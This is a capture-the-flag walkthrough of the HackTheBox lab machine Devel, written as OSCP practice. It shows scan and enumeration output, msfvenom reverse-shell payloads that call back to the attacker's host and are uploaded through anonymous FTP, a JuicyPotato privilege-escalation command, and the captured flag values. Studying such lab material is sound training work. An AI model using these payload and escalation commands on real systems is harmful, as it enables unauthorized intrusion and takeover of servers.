HackTheBox | Devel

In this walkthrough, I demonstrate how I obtained complete ownership of Devel on HackTheBox
HackTheBox | Devel
In: HackTheBox, TJ Null OSCP Practice, OSCP Prep, Attack, CTF

Nmap Results

# Nmap 7.92 scan initiated Sun Aug 14 23:36:37 2022 as: nmap -T5 -p21,80 -A -oA scan-all -Pn 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.014s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 08-15-22  04:12AM                 2918 exploit.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|8.1|2012 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   13.74 ms 10.10.14.1
2   14.45 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 14 23:36:57 2022 -- 1 IP address (1 host up) scanned in 20.62 seconds





Service Enumeration

TCP/21

FTP service allows anonymous logon and file upload. If the FTP service is tied in with the web server, it might be possible to leverage this as an attack vector.

Try creating an HTML file to test that hypothesis.

<html>
	<head>
		<title>0xBEN</title>
	</head>
	<body>
		<h1>0xBEN was here</h1>
	</body>
</html>



TCP/80

Directory and file enumeration with gobuster

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,php -t 25 -o gobuster-out -r

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.5
[+] Method:                  GET
[+] Threads:                 25
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/08/14 23:48:07 Starting gobuster in directory enumeration mode
===============================================================
/TEST.html            (Status: 200) [Size: 98]
/Test.html            (Status: 200) [Size: 98]
/aspnet_client        (Status: 403) [Size: 1233]
/test.html            (Status: 200) [Size: 98]  

test.html is the file I uploaded





Exploit

I am able to upload a reverse shell payload to the web server's root directory due to anonymous FTP login and file upload. Generate the reverse shell payload:

msfvenom -p windows/shell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -f aspx -o pwnz.aspx

Start a netcat listener to catch the reverse shell. Upload the exploit to the web root directory via FTP. Then, load the reverse shell in the web browser by browsing to http://10.10.10.5/pwnz.aspx .





Post-Exploit Enumeration

I changed the reverse shell to windows/powershell_reverse_tcp instead, since some of the commands were failing due to having a non-interactive logon.

Operating Environment

OS & Kernel

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          15/8/2022, 4:09:53 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.472 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.552 MB
Virtual Memory: In Use:    589 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::711e:316d:7bdb:7f8b
                                 [04]: dead:beef::58c0:f1cf:abc6:bb9e

Current User

USER INFORMATION
----------------

User Name       SID                                                           
=============== ==============================================================
iis apppool\web S-1-5-82-2971860261-2701350812-2118117159-340795515-2183480550


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled



Users and Groups

Local Users

Get-WmiObject -Class Win32_UserAccount | Select-Object Domain, Name, LocalAccount, Disabled

Domain              Name                       LocalAccount            Disabled
------              ----                       ------------            --------
DEVEL               Administrator                      True               False
DEVEL               babis                              True               False
DEVEL               Guest                              True                True

Local Groups

Get-WmiObject -Class Win32_Group | Select-Object Domain, Name, Status, LocalAccount | Format-Table -AutoSize

Domain Name                            Status LocalAccount
------ ----                            ------ ------------
DEVEL  Administrators                  OK             True
DEVEL  Backup Operators                OK             True
DEVEL  Cryptographic Operators         OK             True
DEVEL  Distributed COM Users           OK             True
DEVEL  Event Log Readers               OK             True
DEVEL  Guests                          OK             True
DEVEL  IIS_IUSRS                       OK             True
DEVEL  Network Configuration Operators OK             True
DEVEL  Performance Log Users           OK             True
DEVEL  Performance Monitor Users       OK             True
DEVEL  Power Users                     OK             True
DEVEL  Remote Desktop Users            OK             True
DEVEL  Replicator                      OK             True
DEVEL  Users                           OK             True



Network Configurations

Open Ports

netstat -ano | select-string listen

  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1352
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       656
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       376
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       752
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       480
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       488
  TCP    10.10.10.5:139         0.0.0.0:0              LISTENING       4
  TCP    [::]:21                [::]:0                 LISTENING       1352
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       656
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5357              [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       376
  TCP    [::]:49153             [::]:0                 LISTENING       752
  TCP    [::]:49154             [::]:0                 LISTENING       820
  TCP    [::]:49155             [::]:0                 LISTENING       480
  TCP    [::]:49156             [::]:0                 LISTENING       488





Privilege Escalation

The IIS service account has SeImpersonatePrivilege enabled, which seems like a perfect candidate for a JuicyPotato.

Looking at the output of the systeminfo command, this is a 32-bit system, so we'll need to keep that in mind when downloading the necessary binaries and creating payloads.

  1. Download the 32-bit JuicyPotato.exe payload
  2. Create another reverse shell payload for use with JuicyPotato: msfvenom -p windows/reverse_shell_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -f exe -a x86 --platform windows -o privesc.exe
  3. Use your FTP connection to upload the files to the web server
  4. Refer to this list to find a SYSTEM CLSID for Windows 7 Enterprise.
  5. Run the exploit: .\JuicyPotato.exe -p .\privesc.exe -l 443 -t * -c '{69AD4AEE-51BE-439b-A92C-86AE490E8B30}'





Flags

C:\Users\babis\Desktop\user.txt

78fd20df57be2a65478c7f495cd87f4b

C:\Users\Administrator\Desktop\root.txt

d4fbac284abe6e02fddfd138761d2027
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.